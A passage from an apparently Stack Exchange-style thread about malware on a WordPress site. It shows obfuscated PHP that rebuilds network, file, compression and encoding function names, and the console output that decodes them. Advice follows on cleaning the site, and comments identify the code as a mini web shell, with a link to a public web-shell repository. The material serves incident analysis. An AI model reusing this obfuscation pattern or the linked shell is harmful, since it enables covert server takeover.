$O0O_0_O_0O=$O_OO0O0_0_[44].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[65].$O_OO0O0_0_[10].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[44].$O_OO0O0_0_[39].$O_OO0O0_0_[21].$O_OO0O0_0_[56].$O_OO0O0_0_[31].$O_OO0O0_0_[10].$O_OO0O0_0_[56].$O_OO0O0_0_[21].$O_OO0O0_0_[39].$O_OO0O0_0_[39].$O_OO0O0_0_[3].$O_OO0O0_0_[21].$O_OO0O0_0_[56].$O_OO0O0_0_[25];
$OO00_0OO__=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[21].$O_OO0O0_0_[46].$O_OO0O0_0_[10].$O_OO0O0_0_[40].$O_OO0O0_0_[0].$O_OO0O0_0_[56].$O_OO0O0_0_[25].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[56].$O_OO0O0_0_[39].$O_OO0O0_0_[63].$O_OO0O0_0_[31].$O_OO0O0_0_[5].$O_OO0O0_0_[13];
$O0OOO00___=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[21].$O_OO0O0_0_[46].$O_OO0O0_0_[10].$O_OO0O0_0_[65].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[46].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[21].$O_OO0O0_0_[10].$O_OO0O0_0_[34].$O_OO0O0_0_[21].$O_OO0O0_0_[13].$O_OO0O0_0_[21];
$O_0_OO_0O0=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[21].$O_OO0O0_0_[46].$O_OO0O0_0_[10].$O_OO0O0_0_[40].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[3].$O_OO0O0_0_[39].$O_OO0O0_0_[0].$O_OO0O0_0_[56].$O_OO0O0_0_[25].$O_OO0O0_0_[63].$O_OO0O0_0_[5].$O_OO0O0_0_[65];
$OOO___0O00=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[21].$O_OO0O0_0_[46].$O_OO0O0_0_[10].$O_OO0O0_0_[40].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[13].$O_OO0O0_0_[63].$O_OO0O0_0_[46].$O_OO0O0_0_[31].$O_OO0O0_0_[0].$O_OO0O0_0_[60].$O_OO0O0_0_[13];
$O0_O00OO__=$O_OO0O0_0_[42].$O_OO0O0_0_[63].$O_OO0O0_0_[39].$O_OO0O0_0_[31].$O_OO0O0_0_[10].$O_OO0O0_0_[44].$O_OO0O0_0_[60].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[5].$O_OO0O0_0_[13].$O_OO0O0_0_[31].$O_OO0O0_0_[5].$O_OO0O0_0_[13].$O_OO0O0_0_[40];
$O0_OO0O0__=$O_OO0O0_0_[42].$O_OO0O0_0_[63].$O_OO0O0_0_[39].$O_OO0O0_0_[31].$O_OO0O0_0_[10].$O_OO0O0_0_[65].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[5].$O_OO0O0_0_[13].$O_OO0O0_0_[31].$O_OO0O0_0_[5].$O_OO0O0_0_[13].$O_OO0O0_0_[40];
$OO0O0__0O_=$O_OO0O0_0_[45].$O_OO0O0_0_[13].$O_OO0O0_0_[13].$O_OO0O0_0_[44].$O_OO0O0_0_[10].$O_OO0O0_0_[3].$O_OO0O0_0_[60].$O_OO0O0_0_[63].$O_OO0O0_0_[39].$O_OO0O0_0_[34].$O_OO0O0_0_[10].$O_OO0O0_0_[43].$O_OO0O0_0_[60].$O_OO0O0_0_[31].$O_OO0O0_0_[53].$O_OO0O0_0_[55];
$OO__O0O00_=$O_OO0O0_0_[42].$O_OO0O0_0_[60].$O_OO0O0_0_[5].$O_OO0O0_0_[56].$O_OO0O0_0_[13].$O_OO0O0_0_[63].$O_OO0O0_0_[0].$O_OO0O0_0_[5].$O_OO0O0_0_[10].$O_OO0O0_0_[31].$O_OO0O0_0_[15].$O_OO0O0_0_[63].$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[40];
$OO__0O_00O=$O_OO0O0_0_[65].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[45].$O_OO0O0_0_[0].$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[3].$O_OO0O0_0_[55].$O_OO0O0_0_[5].$O_OO0O0_0_[21].$O_OO0O0_0_[46].$O_OO0O0_0_[31];
$O0__0_O0OO=$O_OO0O0_0_[3].$O_OO0O0_0_[21].$O_OO0O0_0_[40].$O_OO0O0_0_[31].$O_OO0O0_0_[62].$O_OO0O0_0_[58].$O_OO0O0_0_[10].$O_OO0O0_0_[31].$O_OO0O0_0_[5].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$OO0O__O00_=$O_OO0O0_0_[3].$O_OO0O0_0_[21].$O_OO0O0_0_[40].$O_OO0O0_0_[31].$O_OO0O0_0_[62].$O_OO0O0_0_[58].$O_OO0O0_0_[10].$O_OO0O0_0_[34].$O_OO0O0_0_[31].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$O_0__0O0OO=$O_OO0O0_0_[53].$O_OO0O0_0_[21].$O_OO0O0_0_[27].$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[31].$O_OO0O0_0_[5].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$OO_000_O_O=$O_OO0O0_0_[53].$O_OO0O0_0_[21].$O_OO0O0_0_[27].$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[34].$O_OO0O0_0_[31].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$O_0O__0OO0=$O_OO0O0_0_[65].$O_OO0O0_0_[59].$O_OO0O0_0_[60].$O_OO0O0_0_[5].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[46].$O_OO0O0_0_[44].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[40].$O_OO0O0_0_[40];
$O00O_0O__O=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[10].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[44].$O_OO0O0_0_[39].$O_OO0O0_0_[21].$O_OO0O0_0_[56].$O_OO0O0_0_[31];
$OO0O___0O0=$O_OO0O0_0_[37].$O_OO0O0_0_[40].$O_OO0O0_0_[0].$O_OO0O0_0_[5].$O_OO0O0_0_[10].$O_OO0O0_0_[31].$O_OO0O0_0_[5].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$O00OO__0O_=$O_OO0O0_0_[42].$O_OO0O0_0_[63].$O_OO0O0_0_[39].$O_OO0O0_0_[31].$O_OO0O0_0_[10].$O_OO0O0_0_[31].$O_OO0O0_0_[15].$O_OO0O0_0_[63].$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[40];
$O0OO__O0_0=$O_OO0O0_0_[56].$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[10].$O_OO0O0_0_[40].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[0].$O_OO0O0_0_[44].$O_OO0O0_0_[13];
$O_O000O__O=$O_OO0O0_0_[21].$O_OO0O0_0_[53].$O_OO0O0_0_[53].$O_OO0O0_0_[21].$O_OO0O0_0_[55].$O_OO0O0_0_[10].$O_OO0O0_0_[40].$O_OO0O0_0_[45].$O_OO0O0_0_[63].$O_OO0O0_0_[42].$O_OO0O0_0_[13];
$OO0_O00_O_=$O_OO0O0_0_[44].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[65].$O_OO0O0_0_[10].$O_OO0O0_0_[40].$O_OO0O0_0_[44].$O_OO0O0_0_[39].$O_OO0O0_0_[63].$O_OO0O0_0_[13];
$OO_OO_0_00=$O_OO0O0_0_[44].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[65].$O_OO0O0_0_[10].$O_OO0O0_0_[46].$O_OO0O0_0_[21].$O_OO0O0_0_[13].$O_OO0O0_0_[56].$O_OO0O0_0_[45];
$O_0O0OO__0=$O_OO0O0_0_[56].$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[10].$O_OO0O0_0_[31].$O_OO0O0_0_[53].$O_OO0O0_0_[53].$O_OO0O0_0_[0].$O_OO0O0_0_[53];
$OOO00__O0_=$O_OO0O0_0_[56].$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[10].$O_OO0O0_0_[56].$O_OO0O0_0_[39].$O_OO0O0_0_[0].$O_OO0O0_0_[40].$O_OO0O0_0_[31];
$O0O_0__0OO=$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[31].$O_OO0O0_0_[5].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$OO0_O__O00=$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[34].$O_OO0O0_0_[31].$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$OOO0__0_O0=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[10].$O_OO0O0_0_[40].$O_OO0O0_0_[44].$O_OO0O0_0_[39].$O_OO0O0_0_[63].$O_OO0O0_0_[13];
$O_00_O_0OO=$O_OO0O0_0_[44].$O_OO0O0_0_[21].$O_OO0O0_0_[53].$O_OO0O0_0_[40].$O_OO0O0_0_[31].$O_OO0O0_0_[10].$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39];
$O0__0OO_O0=$O_OO0O0_0_[65].$O_OO0O0_0_[59].$O_OO0O0_0_[63].$O_OO0O0_0_[5].$O_OO0O0_0_[42].$O_OO0O0_0_[39].$O_OO0O0_0_[21].$O_OO0O0_0_[13].$O_OO0O0_0_[31];
$O___0OO0O0=$O_OO0O0_0_[65].$O_OO0O0_0_[59].$O_OO0O0_0_[34].$O_OO0O0_0_[31].$O_OO0O0_0_[42].$O_OO0O0_0_[39].$O_OO0O0_0_[21].$O_OO0O0_0_[13].$O_OO0O0_0_[31];
$O_O_0_O00O=$O_OO0O0_0_[56].$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[10].$O_OO0O0_0_[63].$O_OO0O0_0_[5].$O_OO0O0_0_[63].$O_OO0O0_0_[13];
$O__OO_00O0=$O_OO0O0_0_[56].$O_OO0O0_0_[60].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[10].$O_OO0O0_0_[31].$O_OO0O0_0_[15].$O_OO0O0_0_[31].$O_OO0O0_0_[56];
$O_OO_O_000=$O_OO0O0_0_[21].$O_OO0O0_0_[53].$O_OO0O0_0_[53].$O_OO0O0_0_[21].$O_OO0O0_0_[55].$O_OO0O0_0_[10].$O_OO0O0_0_[44].$O_OO0O0_0_[0].$O_OO0O0_0_[44];
$O00__O_0OO=$O_OO0O0_0_[50].$O_OO0O0_0_[21].$O_OO0O0_0_[53].$O_OO0O0_0_[10].$O_OO0O0_0_[34].$O_OO0O0_0_[60].$O_OO0O0_0_[46].$O_OO0O0_0_[44];
$OO_O00_O_0=$O_OO0O0_0_[63].$O_OO0O0_0_[40].$O_OO0O0_0_[10].$O_OO0O0_0_[21].$O_OO0O0_0_[53].$O_OO0O0_0_[53].$O_OO0O0_0_[21].$O_OO0O0_0_[55];
$OO_00__O0O=$O_OO0O0_0_[13].$O_OO0O0_0_[46].$O_OO0O0_0_[44].$O_OO0O0_0_[42].$O_OO0O0_0_[63].$O_OO0O0_0_[39].$O_OO0O0_0_[31];
$O_OO0_O00_=$O_OO0O0_0_[44].$O_OO0O0_0_[53].$O_OO0O0_0_[63].$O_OO0O0_0_[5].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[53];
$O_OO_000_O=$O_OO0O0_0_[46].$O_OO0O0_0_[13].$O_OO0O0_0_[10].$O_OO0O0_0_[53].$O_OO0O0_0_[21].$O_OO0O0_0_[5].$O_OO0O0_0_[34];
$O0O00___OO=$O_OO0O0_0_[63].$O_OO0O0_0_[46].$O_OO0O0_0_[44].$O_OO0O0_0_[39].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$O_O00O0O__=$O_OO0O0_0_[31].$O_OO0O0_0_[15].$O_OO0O0_0_[44].$O_OO0O0_0_[39].$O_OO0O0_0_[0].$O_OO0O0_0_[34].$O_OO0O0_0_[31];
$O0_0O_0OO_=$O_OO0O0_0_[60].$O_OO0O0_0_[40].$O_OO0O0_0_[39].$O_OO0O0_0_[31].$O_OO0O0_0_[31].$O_OO0O0_0_[44];
$O0__0_OOO0=$O_OO0O0_0_[60].$O_OO0O0_0_[5].$O_OO0O0_0_[39].$O_OO0O0_0_[63].$O_OO0O0_0_[5].$O_OO0O0_0_[25];
$OO_O_00O0_=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[44].$O_OO0O0_0_[0].$O_OO0O0_0_[40];
$OOO0_O_0_0=$O_OO0O0_0_[40].$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[39].$O_OO0O0_0_[31].$O_OO0O0_0_[5];
$O_OO0_0_O0=$O_OO0O0_0_[45].$O_OO0O0_0_[31].$O_OO0O0_0_[15].$O_OO0O0_0_[34].$O_OO0O0_0_[31].$O_OO0O0_0_[56];
$O0OO0O_0__=$O_OO0O0_0_[65].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[31].$O_OO0O0_0_[5].$O_OO0O0_0_[50];
$OO_O00_0_O=$O_OO0O0_0_[42].$O_OO0O0_0_[27].$O_OO0O0_0_[53].$O_OO0O0_0_[63].$O_OO0O0_0_[13].$O_OO0O0_0_[31];
$O0_0_O_O0O=$O_OO0O0_0_[42].$O_OO0O0_0_[56].$O_OO0O0_0_[39].$O_OO0O0_0_[0].$O_OO0O0_0_[40].$O_OO0O0_0_[31];
$OO__O_0O00=$O_OO0O0_0_[42].$O_OO0O0_0_[53].$O_OO0O0_0_[31].$O_OO0O0_0_[21].$O_OO0O0_0_[34];
$OO__O_O000=$O_OO0O0_0_[42].$O_OO0O0_0_[65].$O_OO0O0_0_[31].$O_OO0O0_0_[13].$O_OO0O0_0_[40];
$O_O_O00O_0=$O_OO0O0_0_[56].$O_OO0O0_0_[0].$O_OO0O0_0_[60].$O_OO0O0_0_[5].$O_OO0O0_0_[13];
$O0O__0_O0O=$O_OO0O0_0_[56].$O_OO0O0_0_[45].$O_OO0O0_0_[46].$O_OO0O0_0_[0].$O_OO0O0_0_[34];
$O0OOO__0_0=$O_OO0O0_0_[13].$O_OO0O0_0_[53].$O_OO0O0_0_[63].$O_OO0O0_0_[46];
$O0O_O0O0__=$O_OO0O0_0_[37].$O_OO0O0_0_[0].$O_OO0O0_0_[63].$O_OO0O0_0_[5];
$OO_O00O__0=$O_OO0O0_0_[42].$O_OO0O0_0_[31].$O_OO0O0_0_[0].$O_OO0O0_0_[42];
$OOO_00_0O_=$O_OO0O0_0_[46].$O_OO0O0_0_[34].$O_OO0O0_0_[9];

echo $O_OO0O0_0_ . PHP_EOL;
echo $O000OO___O . PHP_EOL;
echo $O0O_0_O_0O . PHP_EOL;
echo $OO00_0OO__ . PHP_EOL;
echo $O0OOO00___ . PHP_EOL;
echo $O_0_OO_0O0 . PHP_EOL;
echo $OOO___0O00 . PHP_EOL;
echo $O0_O00OO__ . PHP_EOL;
echo $O0_OO0O0__ . PHP_EOL;
echo $OO0O0__0O_ . PHP_EOL;
echo $OO__O0O00_ . PHP_EOL;
echo $OO__0O_00O . PHP_EOL;
echo $O0__0_O0OO . PHP_EOL;
echo $OO0O__O00_ . PHP_EOL;
echo $O_0__0O0OO . PHP_EOL;
echo $OO_000_O_O . PHP_EOL;
echo $O_0O__0OO0 . PHP_EOL;
echo $O00O_0O__O . PHP_EOL;
echo $OO0O___0O0 . PHP_EOL;
echo $O00OO__0O_ . PHP_EOL;
echo $O0OO__O0_0 . PHP_EOL;
echo $O_O000O__O . PHP_EOL;
echo $OO0_O00_O_ . PHP_EOL;
echo $OO_OO_0_00 . PHP_EOL;
echo $O_0O0OO__0 . PHP_EOL;
echo $OOO00__O0_ . PHP_EOL;
echo $O0O_0__0OO . PHP_EOL;
echo $OO0_O__O00 . PHP_EOL;
echo $OOO0__0_O0 . PHP_EOL;
echo $O_00_O_0OO . PHP_EOL;
echo $O0__0OO_O0 . PHP_EOL;
echo $O___0OO0O0 . PHP_EOL;
echo $O_O_0_O00O . PHP_EOL;
echo $O__OO_00O0 . PHP_EOL;
echo $O_OO_O_000 . PHP_EOL;
echo $O00__O_0OO . PHP_EOL;
echo $OO_O00_O_0 . PHP_EOL;
echo $OO_00__O0O . PHP_EOL;
echo $O_OO0_O00_ . PHP_EOL;
echo $O_OO_000_O . PHP_EOL;
echo $O0O00___OO . PHP_EOL;
echo $O_O00O0O__ . PHP_EOL;
echo $O0_0O_0OO_ . PHP_EOL;
echo $O0__0_OOO0 . PHP_EOL;
echo $OO_O_00O0_ . PHP_EOL;
echo $OOO0_O_0_0 . PHP_EOL;
echo $O_OO0_0_O0 . PHP_EOL;
echo $O0OO0O_0__ . PHP_EOL;
echo $OO_O00_0_O . PHP_EOL;
echo $O0_0_O_O0O . PHP_EOL;
echo $OO__O_0O00 . PHP_EOL;
echo $OO__O_O000 . PHP_EOL;
echo $O_O_O00O_0 . PHP_EOL;
echo $O0O__0_O0O . PHP_EOL;
echo $O0OOO__0_0 . PHP_EOL;
echo $O0O_O0O0__ . PHP_EOL;
echo $OO_O00O__0 . PHP_EOL;
echo $OOO_00_0O_ . PHP_EOL;

?>
```

```
root@ubuntu:/tmp# php b
oA-bNnK7L5_JUtRxIY+WCa93Vk0wM1OeSDdB2j/lsXfqphm*TGvQHrPyc\4zuF6iZg8E
stream_context_create
preg_replace_callback
stream_socket_client
stream_get_meta_data
stream_set_blocking
stream_set_timeout
file_put_contents
file_get_contents
http_build_query
function_exists
gethostbyname
base64_encode
base64_decode
rawurlencode
rawurldecode
gzuncompress
str_replace
json_encode
file_exists
curl_setopt
array_shift
preg_split
preg_match
curl_error
curl_close
urlencode
urldecode
str_split
parse_url
gzinflate
gzdeflate
curl_init
curl_exec
array_pop
var_dump
is_array
tmpfile
print_r
mt_rand
implode
explode
usleep
unlink
strpos
strlen
hexdec
getenv
fwrite
fclose
fread
fgets
count
chmod
trim
join
feof
md5
```

Answer (score 0):

Overwrite WordPress source files with a fresh copy and deactivate plugins. Install WordFence and scan the core, plugins and upload directories (enable no execution from the upload folder).

If the problem persists, it might have created a [cron](https://en.wikipedia.org/wiki/Cron) job. You can install WP-Control or other plugin and remove it manually.

Comment: Note: i decoded this and it seems to be a admin panel for full FTP access and possibly more.

Seems to be using 'Zerion Mini Shell' or similar
https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/mini.php

Comment: can it create a cron job inside a docker container?

Comment: @21thek can you give some instructions on how you decoded it?